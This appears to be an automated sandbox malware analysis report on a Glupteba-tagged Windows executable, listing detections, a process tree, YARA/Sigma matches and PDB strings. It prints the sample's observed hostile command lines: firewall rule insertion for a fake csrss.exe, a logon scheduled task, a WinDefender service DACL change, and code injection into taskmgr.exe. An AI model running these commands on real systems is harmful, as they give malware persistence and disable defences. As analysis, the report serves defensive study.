Windows Analysis Report f6oNLRKHUy.exe

Overview

General Information

Sample Name: f6oNLRKHUy.exe
Analysis ID: 506223
MD5: 3c3046f640f7825c720849aaa809c963
SHA1: 61ae00ec8041de7826deceb176c495ab23392efb
SHA256: 3993aa1a1cf9ba37316db59a6ef67b15ef0f49fcd79cf2420989b9e4a19ffc2a
Tags: exe, Glupteba

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Sigma detected: System File Execution Location Anomaly
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Machine Learning detection for sample
Creates files in the system32 config directory
May modify the system service descriptor table (often done to hook functions)
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to inject threads in other processes
Performs DNS TXT record lookups
Sigma detected: Suspicious Service DACL Modification
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Enables security privileges
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Netsh Port or Application Allowed
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • f6oNLRKHUy.exe (PID: 6976 cmdline: 'C:\Users\user\Desktop\f6oNLRKHUy.exe' MD5: 3C3046F640F7825C720849AAA809C963)
    • f6oNLRKHUy.exe (PID: 7112 cmdline: C:\Users\user\Desktop\f6oNLRKHUy.exe MD5: 3C3046F640F7825C720849AAA809C963)
      • cmd.exe (PID: 6196 cmdline: C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • netsh.exe (PID: 5832 cmdline: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)
      • csrss.exe (PID: 6272 cmdline: C:\Windows\rss\csrss.exe '' MD5: 3C3046F640F7825C720849AAA809C963)
        • schtasks.exe (PID: 1516 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6320 cmdline: schtasks /delete /tn ScheduledUpdate /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 5468 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 956 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 6352 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • mountvol.exe (PID: 6608 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
          • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • shutdown.exe (PID: 6848 cmdline: shutdown -r -t 5 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)
          • conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • injector.exe (PID: 3576 cmdline: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll MD5: D98E33B66343E7C96158444127A117F6)
          • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • windefender.exe (PID: 6644 cmdline: C:\Windows\windefender.exe MD5: E0A50C60A85BFBB9ECF45BFF0239AAA3)
          • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 1360 cmdline: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • sc.exe (PID: 6440 cmdline: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • TrustedInstaller.exe (PID: 7076 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: 4578046C54A954C917BB393B70BA0AEB)
  • svchost.exe (PID: 6172 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • csrss.exe (PID: 5432 cmdline: C:\Windows\rss\csrss.exe MD5: 3C3046F640F7825C720849AAA809C963)
    • csrss.exe (PID: 6460 cmdline: C:\Windows\rss\csrss.exe MD5: 3C3046F640F7825C720849AAA809C963)
  • csrss.exe (PID: 6864 cmdline: 'C:\Windows\rss\csrss.exe' MD5: 3C3046F640F7825C720849AAA809C963)
    • csrss.exe (PID: 6972 cmdline: C:\Windows\rss\csrss.exe MD5: 3C3046F640F7825C720849AAA809C963)
  • svchost.exe (PID: 1340 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3640 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • csrss.exe (PID: 6128 cmdline: 'C:\Windows\rss\csrss.exe' MD5: 3C3046F640F7825C720849AAA809C963)
    • csrss.exe (PID: 6496 cmdline: C:\Windows\rss\csrss.exe MD5: 3C3046F640F7825C720849AAA809C963)
  • windefender.exe (PID: 724 cmdline: C:\Windows\windefender.exe MD5: E0A50C60A85BFBB9ECF45BFF0239AAA3)
  • svchost.exe (PID: 6556 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2528 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |
00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |
0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |
00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |
00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
31.2.csrss.exe.9a76e0.3.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth |
• 0x444b8:$s2: The Magic Word!
• 0x505f8:$s2: The Magic Word!
• 0x44818:$s3: Software\Oracle\VirtualBox
• 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
20.2.csrss.exe.9af2e0.2.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth |
• 0x3c8b8:$s2: The Magic Word!
• 0x489f8:$s2: The Magic Word!
• 0x3cc18:$s3: Software\Oracle\VirtualBox
• 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
16.2.csrss.exe.9a76e0.3.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth |
• 0x444b8:$s2: The Magic Word!
• 0x505f8:$s2: The Magic Word!
• 0x44818:$s3: Software\Oracle\VirtualBox
• 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
1.2.f6oNLRKHUy.exe.9ad080.2.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth |
• 0x3eb18:$s2: The Magic Word!
• 0x4ac58:$s2: The Magic Word!
• 0x3ee78:$s3: Software\Oracle\VirtualBox
• 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
1.2.f6oNLRKHUy.exe.9af2e0.3.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth |
• 0x3c8b8:$s2: The Magic Word!
• 0x489f8:$s2: The Magic Word!
• 0x3cc18:$s3: Software\Oracle\VirtualBox
• 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73

Sigma Overview

System Summary:

Sigma detected: System File Execution Location Anomaly
Source: Process started, Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: C:\Windows\rss\csrss.exe '', CommandLine: C:\Windows\rss\csrss.exe '', CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\f6oNLRKHUy.exe, ParentImage: C:\Users\user\Desktop\f6oNLRKHUy.exe, ParentProcessId: 7112, ProcessCommandLine: C:\Windows\rss\csrss.exe '', ProcessId: 6272
Sigma detected: Suspicious Service DACL Modification
Source: Process started, Author: Jonhnathan Ribeiro, oscd.community: Data: Command: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), CommandLine: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1360, ProcessCommandLine: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), ProcessId: 6440
Sigma detected: Netsh Port or Application Allowed
Source: Process started, Author: Markus Neis, Sander Wiebing: Data: Command: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes, CommandLine: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6196, ProcessCommandLine: netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes, ProcessId: 5832
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started, Author: vburov: Data: Command: C:\Windows\rss\csrss.exe '', CommandLine: C:\Windows\rss\csrss.exe '', CommandLine|base64offset|contains: , Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: C:\Users\user\Desktop\f6oNLRKHUy.exe, ParentImage: C:\Users\user\Desktop\f6oNLRKHUy.exe, ParentProcessId: 7112, ProcessCommandLine: C:\Windows\rss\csrss.exe '', ProcessId: 6272

Persistence and Installation Behavior:

Sigma detected: Schedule system process
Source: Process started, Author: Joe Security: Data: Command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F, CommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\rss\csrss.exe '', ParentImage: C:\Windows\rss\csrss.exe, ParentProcessId: 6272, ProcessCommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F, ProcessId: 1516

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: f6oNLRKHUy.exe, Metadefender: Detection: 31%
Source: f6oNLRKHUy.exe, ReversingLabs: Detection: 52%
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll, Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll, ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe, Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe, ReversingLabs: Detection: 73%
Source: C:\Windows\rss\csrss.exe, Metadefender: Detection: 31%
Source: C:\Windows\rss\csrss.exe, ReversingLabs: Detection: 52%
Source: C:\Windows\windefender.exe, Metadefender: Detection: 28%
Source: C:\Windows\windefender.exe, ReversingLabs: Detection: 57%
Machine Learning detection for sample
Source: f6oNLRKHUy.exe, Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Windows\rss\csrss.exe, Joe Sandbox ML: detected
Source: 8.2.csrss.exe.11c06000.10.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.csrss.exe.11b86000.9.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: f6oNLRKHUy.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
            Source: Binary string: Loader.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdb source: f6oNLRKHUy.exe, 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627870906.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.390880568.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.392824484.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.406627827.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.408434896.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.428005891.0000000000C57000.00000040.00020000.sdmp
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
